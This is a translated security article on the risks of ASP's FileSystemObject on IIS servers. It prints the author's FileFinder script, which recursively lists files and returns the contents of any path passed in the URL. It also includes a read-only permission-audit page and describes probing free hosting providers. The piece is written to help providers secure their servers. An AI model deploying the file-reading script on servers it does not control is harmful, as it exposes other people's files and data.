Threats and countermeasures of the Scripting.FileSystemObject object in ASP

zhaozj2021-02-08  249

Edward Yang (EDYANG75@sina.com)

The Scripting.FileSystemObject object is one of the COM objects that Scrrun.dll provides for use from VBScript / JScript. It offers very convenient access to text files and directories, but it also poses a certain threat to the data security of an IIS web server.

Before continuing, please download the FileFinder ASP source code from the Source column of the download area on the author's home page, http://263.9cbs.net/edyang/.

The FileFinder code is simple, consisting of three functions and 30 lines of sequential code.

The most critical part is the FindFiles function. It traverses a directory by calling itself recursively and searches for files with a specific file extension.

Function FindFiles(strStartFolder, strExt)
    Dim n
    Dim oThisFolder
    Dim oFolders
    Dim oFiles
    Dim oFolder
    Dim oFile

    ' If the system administrator has set permissions carefully, the following code will raise errors.
    ' But some directories can still be viewed, so we simply ignore the errors.
    On Error Resume Next

    n = 0
    Response.Write " Searching " & strStartFolder & " "

    ' g_fs is the script's global Scripting.FileSystemObject instance
    Set oThisFolder = g_fs.GetFolder(strStartFolder)
    Set oFiles = oThisFolder.Files
    For Each oFile In oFiles
        ' If the file has the specified extension, output a link back to this page, but with a different command (cmd).
        ' Here cmd = read, i.e. read the text file at the specified physical path.
        If IsSuffix(oFile.Path, strExt) Then
            Response.Write " " & oFile.Path & " </font>"
            If Err = 0 Then
                n = n + 1
            End If
        End If
    Next

    ' Recurse into each subfolder and add up the matches
    Set oFolders = oThisFolder.SubFolders
    For Each oFolder In oFolders
        n = n + FindFiles(oFolder.Path, strExt)
    Next

    FindFiles = n
End Function

The following code parses the parameters in the URL query string:

' Read the value of each parameter
strCmd = UCase(Request.QueryString("cmd"))
strPath = Request.QueryString("Path")
strExt = Request.QueryString("EXT")
bRawData = UCase(Request.QueryString("RAW"))

' Default: search for .asp files in the current directory
If strPath = "" Then
    strPath = "."
End If
If strExt = "" Then
    strExt = ".asp"
End If

' Execute different code depending on the command (cmd).
' strCmd was upper-cased above, so the cases are compared in upper case.
Select Case strCmd
    Case "FIND"
        Response.Write FindFiles(strPath, strExt) & " file(s) found"
    Case "READ"
        If bRawData = "T" Then
            ' Raw mode: send the file content unmodified
            Response.Write ReadTextFile(strPath)
        Else
            ' Otherwise HTML-encode the content for display in the browser
            Response.Write Server.HTMLEncode(ReadTextFile(strPath))
        End If
    Case Else
        Response.Write "Please specify a command to execute"
End Select

As the analysis above shows, given sufficient permissions, FileFinder can find any text file on the IIS web server and easily display its content. For non-text files, it can confirm that they exist and reveal their paths, which is sometimes extremely important to an advanced hacker.

However, these threats to data depend on a precondition: the user account under which FF.ASP executes must have at least read permission on the directories and files. Because the default security settings after Windows NT Server is installed allow all users to "read" directories and files, any account, whether the default IUSR_SERVERNAME user or any other user, can read directory and file information. Most Windows NT Server system administrators care mainly about whether the system runs and are generally unwilling to change the default directory and file permissions; after all, doing so carries considerable risk and requires a lot of experience. So we can use FileFinder to check whether the security settings of the NT Server hosting the web server are safe.
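The permission check described above can also be done without FileFinder's file-reading feature. The page below is an added example, not the author's FileFinder code: it reports only whether the account running the script can enumerate a few directories outside the web root. The list of target directories and the ProbeFolder helper are assumptions made for illustration.

```vbscript
<%@ Language="VBScript" %>
<%
Option Explicit
' Added example (not part of FileFinder): permission audit for an administrator's own server.
Dim fso, webRoot, targets, t

Set fso = Server.CreateObject("Scripting.FileSystemObject")
webRoot = Server.MapPath("/")

' Assumed target list: directories outside the web root that a hosted
' script should not be able to list. Adjust for the server being audited.
targets = Array( _
    fso.GetParentFolderName(webRoot), _
    fso.GetDriveName(webRoot) & "\", _
    fso.GetSpecialFolder(0).Path, _
    fso.GetSpecialFolder(1).Path)   ' 0 = Windows folder, 1 = System folder

' Returns a status string; counts entries but never outputs file names or content.
Function ProbeFolder(path)
    Dim f, count
    On Error Resume Next
    If Not fso.FolderExists(path) Then
        ProbeFolder = "not visible"
        Exit Function
    End If
    Set f = fso.GetFolder(path)
    count = f.Files.Count + f.SubFolders.Count
    If Err.Number <> 0 Then
        ProbeFolder = "denied (" & Err.Number & ": " & Err.Description & ")"
        Err.Clear
    Else
        ProbeFolder = "READABLE, " & count & " entries"
    End If
End Function

Response.ContentType = "text/plain"
Response.Write "Web root: " & webRoot & vbCrLf
For Each t In targets
    Response.Write t & " -> " & ProbeFolder(t) & vbCrLf
Next
%>
```

Request the page anonymously over HTTP so that it runs as IUSR_SERVERNAME, and delete it once the check is done. Any line reporting READABLE marks a directory whose file system permissions still allow the anonymous account to list it.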

The author specifically tried setting the file system permissions of an IIS web server but, lacking experience, ran into many strange errors; for example, the NT Server 4.0 machine used for the experiment could no longer connect to an Access database. These functions had worked normally before the file system permissions were changed.

Purely for research purposes, the author also ran the experiment on the free ASP hosting spaces he had applied for (including the personal home page provided by 9CBS), and FileFinder ran smoothly there. At http://www2.domaindlx.com/index.html, however, the problem did not occur, which shows that this free ASP home page provider takes the matter fairly seriously. Domaindlx's web server runs on Windows 2000 Server, whose default file system security permissions are not very different from those of NT 4.0.

Given the author's limited ability, the discussion of this issue ends here. This article is offered only as a reference for domestic ASP home page providers, in the hope that it helps protect data security between providers and their customers.

When reposting, please cite the original address: https://www.9cbs.com/read-2701.html
